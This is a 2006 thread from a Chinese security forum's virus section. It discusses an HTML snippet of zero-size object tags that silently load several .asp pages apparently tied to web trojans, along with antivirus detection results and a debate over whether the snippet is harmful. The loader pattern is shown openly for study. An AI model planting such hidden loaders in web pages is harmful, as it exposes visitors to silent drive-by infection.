论坛: 病毒专区 标题: 脚本代码,感兴趣的朋友请进。 复制本贴地址    
作者: coolguy [coolguy]    论坛用户   登录
<html>
<body>
<object data="lhxyexe.asp" weight=0 width= 0 height="14"></object>
<object data="lhxyhta.asp" weight=0 width= 0 height="14"></object>
<object data="20cn.asp" weight=0 width= 0 height="14"></object>
<object data="qqkev.asp" weight=0 width= 0 height="14"></object>
<object data="lhxyexe1.asp" weight=0 width= 0 height="14"></object>
<object data="lhxyhta1.asp" weight=0 width= 0 height="14"></object>
<object data="i"+"e.asp" weight=0 width= 0 height="14"></object>
</body>
</html>


今天看了一篇文章,关于病毒代码的,偶今天心血来潮,于是用杀毒软件进行了一次检测,结果让人大吃一惊,本人首先申明,在论坛里发的这段代码,只是供大家学习之用,本人没有恶意,如果有哪位朋友要拿这段代码做实验的话要慎重,出了问题本人概不负责。

说句个人看法:瑞星是一个很好的杀毒软件,这只是其中的一个小的文件代码而已,还有很多这样的病毒文件,偶发现江民也是没什么反应的,偶不是看低江民,其实偶也装有江民的,大家如果只装一种杀软的话,建议大家选瑞星吧,瑞星技术含量高,偶已经测试过很多个文件,得出的一个结论。

好了,废话少说,具体的请看下边的图片吧。。。


图(1)



图(2)



图(3)



图(4)






[此贴被 coolguy(coolguy) 在 05月04日20时19分 编辑过]

地主 发表时间: 06-05-04 20:10

回复: yimarong [yimarong]   版主   登录
测试过正版的江民,觉得正版的查毒灵敏度会比较高!

网上下的没有测试过!

B1层 发表时间: 06-05-06 19:28

回复: t63113525 [t63113525]   论坛用户   登录
这个代码没有危害性~~~~~

这个代码仅仅是一个引导执行一个网页的东东,不能算病毒
必须结合网络上的其他病毒

就好像AUTOEXEC.BAT本身不是病毒,只有加了一些恶意代码一样

瑞星的反映属于过当的反映

不相信,你执行这个代码之后~~~你的JSJ不会添加能执行的代码,注册表也没被修改,内存也没有被注入等攻击~~~

这如果都算病毒~~~~呵呵~~那我就真不好说了

B2层 发表时间: 06-05-10 22:51

回复: coolguy [coolguy]   论坛用户   登录
由于五一放假,没有做实验用的计算机,代码只是用杀毒软件测试,不过现在节假已经结束,我过两天会拿去测试的。

B3层 发表时间: 06-05-10 23:40

论坛: 病毒专区

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号